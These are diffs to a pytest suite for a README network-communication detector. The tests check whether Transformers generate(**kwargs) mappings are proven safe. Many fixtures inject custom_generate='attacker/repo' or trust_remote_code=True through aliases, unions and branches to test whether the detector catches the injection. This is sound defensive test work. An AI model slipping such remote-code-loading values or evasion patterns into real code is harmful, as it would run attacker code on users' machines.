         "model_call",
         [
@@ -3218,8 +3463,9 @@ class TestNetworkCommDetector:
             "copied = options['custom_generate']\n",
             "for options['custom_generate'] in ['attacker/repo']:\n    pass\n",
             "options = {'custom_generate': 'attacker/repo'}\n",
+            "alias = options\nalias |= {'custom_generate': 'attacker/repo'}\n",
         ],
-        ids=["read", "mutation", "rebind"],
+        ids=["read", "mutation", "rebind", "aliased-augmented-mutation"],
     )
     def test_readme_python_example_allows_safe_options_used_before_later_operations(
         self,

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3229,6 +3229,52 @@ class TestNetworkCommDetector:
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    def test_readme_python_example_allows_non_mutating_generate_kwargs_read(self) -> None:
+        """Reading a proven mapping's length does not expose it to mutation."""
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"options = {'input_ids': 1}\n"
+            b"print(len(options))\n"
+            b"model.generate(**options)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "operation",
+        [
+            "print(options)\n",
+            "options['custom_generate'] = 'attacker/repo'\n",
+            "len = print\nprint(len(options))\n",
+        ],
+        ids=["leaked-mapping", "mapping-mutation", "rebound-len"],
+    )
+    def test_readme_python_example_rejects_unsafe_generate_kwargs_use_before_call(
+        self,
+        operation: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'input_ids': 1}\n"
+            f"{operation}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
     def test_readme_python_example_allows_processor_generate_kwargs_unpacking(self) -> None:
         """A canonical Transformers processor output is a trusted model-input mapping."""
         data = (
@@ -3522,6 +3568,56 @@ class TestNetworkCommDetector:
         assert findings
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_allows_standalone_mapping_device_transfer(self) -> None:
+        """BatchEncoding.to mutates the proven mapping without replacing it."""
+        data = (
+            b"```python\nimport requests\nfrom PIL import Image\n"
+            b"from transformers import AutoModel, AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"inputs = processor(images=image, return_tensors='pt')\n"
+            b"inputs.to('cuda')\n"
+            b"model.generate(**inputs)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "transfer",
+        [
+            "inputs.to(image.mode)\n",
+            "inputs.to('cpu', 'cuda')\n",
+            "print(inputs.to('cuda'))\n",
+        ],
+        ids=["dynamic-device", "extra-device", "leaked-transfer-result"],
+    )
+    def test_readme_python_example_rejects_unsafe_standalone_mapping_device_transfer(
+        self,
+        transfer: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            f"{transfer}"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
 
     def test_readme_python_example_allows_tokenizer_output_on_trusted_model_device(self) -> None:
         """A uniquely bound Transformers model provides a canonical tensor device."""

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -4213,13 +4213,17 @@ class TestNetworkCommDetector:
             ("device = 'cpu'; inputs = processor(images=image, return_tensors='pt').to(device)\n"),
             ("inputs = processor(images=image, return_tensors='pt').to(device='cuda')\n"),
             ("inputs = processor(images=image, return_tensors='pt'); inputs = inputs.to('cpu')\n"),
+            (
+                "device = 'cuda' if torch.cuda.is_available() else 'cpu'\n"
+                "inputs = processor(images=image, return_tensors='pt').to(device)\n"
+            ),
         ],
-        ids=["named-device", "keyword-device", "mapping-rebind"],
+        ids=["named-device", "keyword-device", "mapping-rebind", "bounded-conditional-device"],
     )
     def test_readme_python_example_allows_ordered_mapping_device_transfers(self, inputs_setup: str) -> None:
-        """A unique device literal and provenance-preserving rebinding remain canonical."""
+        """A bounded local device and provenance-preserving rebinding remain canonical."""
         data = (
-            "```python\nimport requests\nfrom PIL import Image\n"
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
             "from transformers import AutoModel, AutoProcessor\n"
             "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
             "image = Image.open(requests.get(image_url, stream=True).raw)\n"
@@ -4451,6 +4455,12 @@ class TestNetworkCommDetector:
             "with torch.no_grad() as device:\n    model.generate(**inputs.to(device))\n",
             "if True:\n    del device\n    model.generate(**inputs.to(device))\n",
             ("if True:\n    device = image.mode\n    inputs = inputs.to(device)\n    model.generate(**inputs)\n"),
+            ("choice = 'cuda' if torch.cuda.is_available() else 'attacker'\nmodel.generate(**inputs.to(choice))\n"),
+            ("choice = 'cuda' if torch.cuda.is_available() else image.mode\nmodel.generate(**inputs.to(choice))\n"),
+            (
+                "choice = torch.device('cuda') if torch.cuda.is_available() else 'cpu'\n"
+                "model.generate(**inputs.to(choice))\n"
+            ),
         ],
         ids=[
             "nested-dynamic-rebind",
@@ -4460,6 +4470,9 @@ class TestNetworkCommDetector:
             "with-target-rebind",
             "deleted-device",
             "mapping-rebind",
+            "conditional-unsafe-branch",
+            "conditional-dynamic-branch",
+            "conditional-non-literal-branch",
         ],
     )
     def test_readme_python_example_rejects_unsafe_call_relative_named_device(

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3574,6 +3574,104 @@ class TestNetworkCommDetector:
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    @pytest.mark.parametrize(
+        "mapping_setup",
+        [
+            "inputs = {'input_ids': 1} | {'attention_mask': 1}\nmodel.generate(**inputs)\n",
+            "model.generate(**({'input_ids': 1} | {'attention_mask': 1}))\n",
+            (
+                "left = {'input_ids': 1}\n"
+                "right = {'attention_mask': 1}\n"
+                "inputs = left | right\n"
+                "model.generate(**inputs)\n"
+            ),
+            ("inputs = ({'input_ids': 1} | {'attention_mask': 1}) | {'token_type_ids': 1}\nmodel.generate(**inputs)\n"),
+            ("inputs = {'custom_generate': None} | {'trust_remote_code': False}\nmodel.generate(**inputs)\n"),
+        ],
+        ids=["named", "inline", "named-operands", "nested", "disabled-remote-options"],
+    )
+    def test_readme_python_example_allows_proven_safe_dict_union(self, mapping_setup: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_setup}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "mapping_setup",
+        [
+            "inputs = {'input_ids': 1} + {'attention_mask': 1}\n",
+            "inputs = {'custom_generate': 'attacker/repo'} | {'input_ids': 1}\n",
+            "inputs = {'input_ids': 1} | {'trust_remote_code': True}\n",
+            "inputs = {'input_ids': 1} | get_options()\n",
+            ("left = {'input_ids': 1}\nunused = left | get_options()\ninputs = left\n"),
+            "key = 'input_ids'\ninputs = {key: 1} | {'attention_mask': 1}\n",
+            (
+                "left = {'input_ids': 1}\n"
+                "left['custom_generate'] = 'attacker/repo'\n"
+                "inputs = left | {'attention_mask': 1}\n"
+            ),
+            (
+                "left = {'input_ids': 1}\n"
+                "alias = left\n"
+                "alias |= {'custom_generate': 'attacker/repo'}\n"
+                "inputs = left | {'attention_mask': 1}\n"
+            ),
+            ("left = {'input_ids': 1}\nleft = get_options()\ninputs = left | {'attention_mask': 1}\n"),
+        ],
+        ids=[
+            "other-binop",
+            "unsafe-left",
+            "unsafe-right",
+            "dynamic-operand",
+            "unrelated-dynamic-union",
+            "computed-key",
+            "mutated-operand",
+            "alias-mutated-operand",
+            "rebound-operand",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_dict_union(self, mapping_setup: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "def get_options():\n"
+            "    return {'custom_generate': 'attacker/repo'}\n"
+            f"{mapping_setup}"
+            "model.generate(**inputs)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_rejects_excessively_nested_dict_union(self) -> None:
+        union = " | ".join("{'input_ids': 1}" for _ in range(600))
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"inputs = {union}\n"
+            "model.generate(**inputs)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
     def test_readme_python_example_bounds_scan_wide_mapping_proof_work(
         self,
         monkeypatch: pytest.MonkeyPatch,
@@ -3899,6 +3997,291 @@ class TestNetworkCommDetector:
         assert findings
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "mapping_flow",
+        [
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "with torch.no_grad():\n"
+                "    if torch.cuda.is_available():\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "    else:\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "    model.generate(**inputs)\n"
+            ),
+        ],
+        ids=["module", "no-grad-body"],
+    )
+    def test_readme_python_example_allows_exhaustive_safe_mapping_branch_join(
+        self,
+        mapping_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_flow}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_allows_module_mapping_branch_join_without_torch_import(self) -> None:
+        data = (
+            b"```python\nimport requests\nfrom PIL import Image\n"
+            b"from transformers import AutoModel, AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"if image.mode:\n"
+            b"    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+            b"else:\n"
+            b"    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+            b"model.generate(**inputs)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        ("before_with", "inside_with", "after_with"),
+        [
+            ("", "", ""),
+            ("", "", "import torch\n"),
+            ("", "    import torch\n", ""),
+            ("if True:\n    import torch\n", "", ""),
+            ("if False:\n    import torch\n", "", ""),
+            ("for _ in range(1):\n    import torch\n", "", ""),
+            ("try:\n    import torch\nexcept Exception:\n    pass\n", "", ""),
+            ("import torch as torch\n", "", ""),
+            ("from torch import no_grad\n", "", ""),
+            ("import torch\ntorch = model\n", "", ""),
+            ("import torch\ndel torch\n", "", ""),
+            ("import torch\nif (torch := model):\n    pass\n", "", ""),
+            ("import torch\ndef shadow(torch):\n    pass\n", "", ""),
+        ],
+        ids=[
+            "missing",
+            "late",
+            "inside-with",
+            "conditional",
+            "unreachable",
+            "loop",
+            "try",
+            "alias",
+            "from-import",
+            "rebind",
+            "delete",
+            "walrus",
+            "argument-shadow",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_torch_import_for_no_grad_branch_join(
+        self,
+        before_with: str,
+        inside_with: str,
+        after_with: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{before_with}"
+            "with torch.no_grad():\n"
+            f"{inside_with}"
+            "    if image.mode:\n"
+            "        inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+            "    else:\n"
+            "        inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+            "    model.generate(**inputs)\n"
+            f"{after_with}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
+
+    @pytest.mark.parametrize(
+        "mapping_flow",
+        [
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = {'custom_generate': 'attacker/repo'}\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = get_inputs()\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "inputs['custom_generate'] = 'attacker/repo'\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "inputs = {'custom_generate': 'attacker/repo'}\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "elif image.mode:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "else:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "for _ in range(1):\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "try:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "except Exception:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "match image.mode:\n"
+                "    case 'RGB':\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "    case _:\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "def deferred():\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "if image.mode:\n"
+                "    if torch.cuda.is_available():\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "    else:\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "if image.mode:\n"
+                "    with torch.no_grad():\n"
+                "        if torch.cuda.is_available():\n"
+                "            inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "        else:\n"
+                "            inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "        model.generate(**inputs)\n"
+            ),
+            (
+                "def torch():\n"
+                "    pass\n"
+                "with torch.no_grad():\n"
+                "    if image.mode:\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "    else:\n"
+                "        inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "if torch.cuda.is_available():\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cuda')\n"
+                "else:\n"
+                "    inputs = processor(images=image, return_tensors='pt').to('cpu')\n"
+                "if image.mode:\n"
+                "    model.generate(**inputs)\n"
+            ),
+        ],
+        ids=[
+            "missing-else",
+            "unsafe-arm",
+            "dynamic-arm",
+            "mutation-after-join",
+            "rebind-after-join",
+            "elif",
+            "loop-else",
+            "try-except",
+            "match",
+            "deferred-call",
+            "arbitrary-enclosing-if",
+            "nested-no-grad",
+            "shadowed-no-grad",
+            "cross-scope-call",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_mapping_branch_join(
+        self,
+        mapping_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "def get_inputs():\n"
+            "    return {'custom_generate': 'attacker/repo'}\n"
+            f"{mapping_flow}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
 
     def test_readme_python_example_allows_ordered_nested_literal_mapping(self) -> None:
         """A static mapping bound earlier in the same supported body is canonical."""

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3606,6 +3606,131 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        "mapping_update",
+        [
+            "options |= {'attention_mask': 1}\n",
+            "options |= {'attention_mask': 1} | {'token_type_ids': 1}\n",
+            "options |= {'custom_generate': None, 'trust_remote_code': False}\n",
+            "options |= {'attention_mask': 1}\noptions |= {'token_type_ids': 1}\n",
+        ],
+        ids=["literal", "literal-union", "disabled-remote-options", "repeated"],
+    )
+    def test_readme_python_example_allows_proven_safe_augmented_dict_union(
+        self,
+        mapping_update: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'input_ids': 1}\n"
+            f"{mapping_update}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "mapping_update",
+        [
+            "options |= {'custom_generate': 'attacker/repo'}\n",
+            "options |= {'trust_remote_code': True}\n",
+            "options |= {'attention_mask': 1} | {'custom_generate': 'attacker/repo'}\n",
+            "key = 'custom_generate'\noptions |= {key: 'attacker/repo'}\n",
+            "options |= {'attention_mask': 1}\noptions |= {'trust_remote_code': True}\n",
+            "options |= {'attention_mask': 1}\noptions['custom_generate'] = 'attacker/repo'\n",
+        ],
+        ids=[
+            "enabled-custom-generate",
+            "enabled-trust-remote-code",
+            "nested-unsafe-union",
+            "computed-key",
+            "safe-then-unsafe-union",
+            "safe-union-then-subscript-mutation",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_augmented_dict_union(
+        self,
+        mapping_update: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'input_ids': 1}\n"
+            f"{mapping_update}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "mapping_updates",
+        [
+            ("alias = options\noptions |= {'attention_mask': 1}\nalias |= {'custom_generate': 'attacker/repo'}\n"),
+            (
+                "first_alias = options\n"
+                "second_alias = first_alias\n"
+                "options |= {'attention_mask': 1}\n"
+                "second_alias |= {'trust_remote_code': True}\n"
+            ),
+            ("alias = options\nalias |= {'custom_generate': 'attacker/repo'}\noptions |= {'attention_mask': 1}\n"),
+            ("alias = options\noptions |= {'attention_mask': 1}\nalias['custom_generate'] = 'attacker/repo'\n"),
+        ],
+        ids=[
+            "source-union-before-alias-augassign",
+            "source-union-before-three-name-alias-augassign",
+            "alias-augassign-before-source-union",
+            "source-union-before-alias-subscript-mutation",
+        ],
+    )
+    def test_readme_python_example_rejects_shared_mapping_mutation_across_safe_source_union(
+        self,
+        mapping_updates: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'input_ids': 1}\n"
+            f"{mapping_updates}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_allows_safe_source_union_with_live_alias(self) -> None:
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"options = {'input_ids': 1}\n"
+            b"alias = options\n"
+            b"options |= {'attention_mask': 1}\n"
+            b"model.generate(**options)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
         "mapping_setup",
         [
             "inputs = {'input_ids': 1} if condition else {'input_ids': 2}\nmodel.generate(**inputs)\n",
@@ -4831,13 +4956,24 @@ class TestNetworkCommDetector:
         [
             ("device = 'cpu'; inputs = processor(images=image, return_tensors='pt').to(device)\n"),
             ("inputs = processor(images=image, return_tensors='pt').to(device='cuda')\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to('xpu')\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to('npu')\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to('hpu')\n"),
             ("inputs = processor(images=image, return_tensors='pt'); inputs = inputs.to('cpu')\n"),
             (
                 "device = 'cuda' if torch.cuda.is_available() else 'cpu'\n"
                 "inputs = processor(images=image, return_tensors='pt').to(device)\n"
             ),
         ],
-        ids=["named-device", "keyword-device", "mapping-rebind", "bounded-conditional-device"],
+        ids=[
+            "named-device",
+            "keyword-device",
+            "xpu-device",
+            "npu-device",
+            "hpu-device",
+            "mapping-rebind",
+            "bounded-conditional-device",
+        ],
     )
     def test_readme_python_example_allows_ordered_mapping_device_transfers(self, inputs_setup: str) -> None:
         """A bounded local device and provenance-preserving rebinding remain canonical."""

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -7213,6 +7213,64 @@ class TestNetworkCommDetector:
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    @pytest.mark.parametrize(
+        "alias_setup",
+        [
+            ("alias = options\nalias: 'mapping'\nif False:\n    alias = {}\n"),
+            ("alias: 'mapping' = options\nif False:\n    alias = {}\n"),
+        ],
+        ids=["value-less-annotation", "annotated-active-alias"],
+    )
+    def test_readme_python_example_rejects_annotated_active_alias_mutation(
+        self,
+        alias_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            f"{alias_setup}"
+            "alias['custom_generate'] = 'attacker/repo'\n"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "alias_rebind",
+        [
+            "alias: 'mapping' = {}\n",
+            "alias = {}\nalias: 'mapping'\n",
+        ],
+        ids=["annotated-rebind", "rebind-before-value-less-annotation"],
+    )
+    def test_readme_python_example_allows_annotated_detached_alias_mutation(
+        self,
+        alias_rebind: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            "alias = options\n"
+            f"{alias_rebind}"
+            "alias['custom_generate'] = 'attacker/repo'\n"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
     def test_readme_python_example_allows_mutation_before_alias_binding(self) -> None:
         """An alias's old object must not taint the mapping it is later bound to."""
         data = (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -5,6 +5,7 @@ import os
 import re
 from collections.abc import Iterator
 from pathlib import Path
+from typing import Any
 from urllib.parse import quote, urlparse
 
 import pytest
@@ -2816,8 +2817,13 @@ class TestNetworkCommDetector:
 
         findings = NetworkCommDetector().scan(data, "README.md")
 
-        assert any(finding["type"] == "network_library" for finding in findings)
-        assert any(finding["type"] == "network_function" for finding in findings)
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
 
     def test_readme_python_example_accepts_constant_annotated_url_binding(self) -> None:
         data = (
@@ -2853,8 +2859,13 @@ class TestNetworkCommDetector:
 
         findings = NetworkCommDetector().scan(data, "README.md")
 
-        assert any(finding["type"] == "network_library" for finding in findings)
-        assert any(finding["type"] == "network_function" for finding in findings)
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
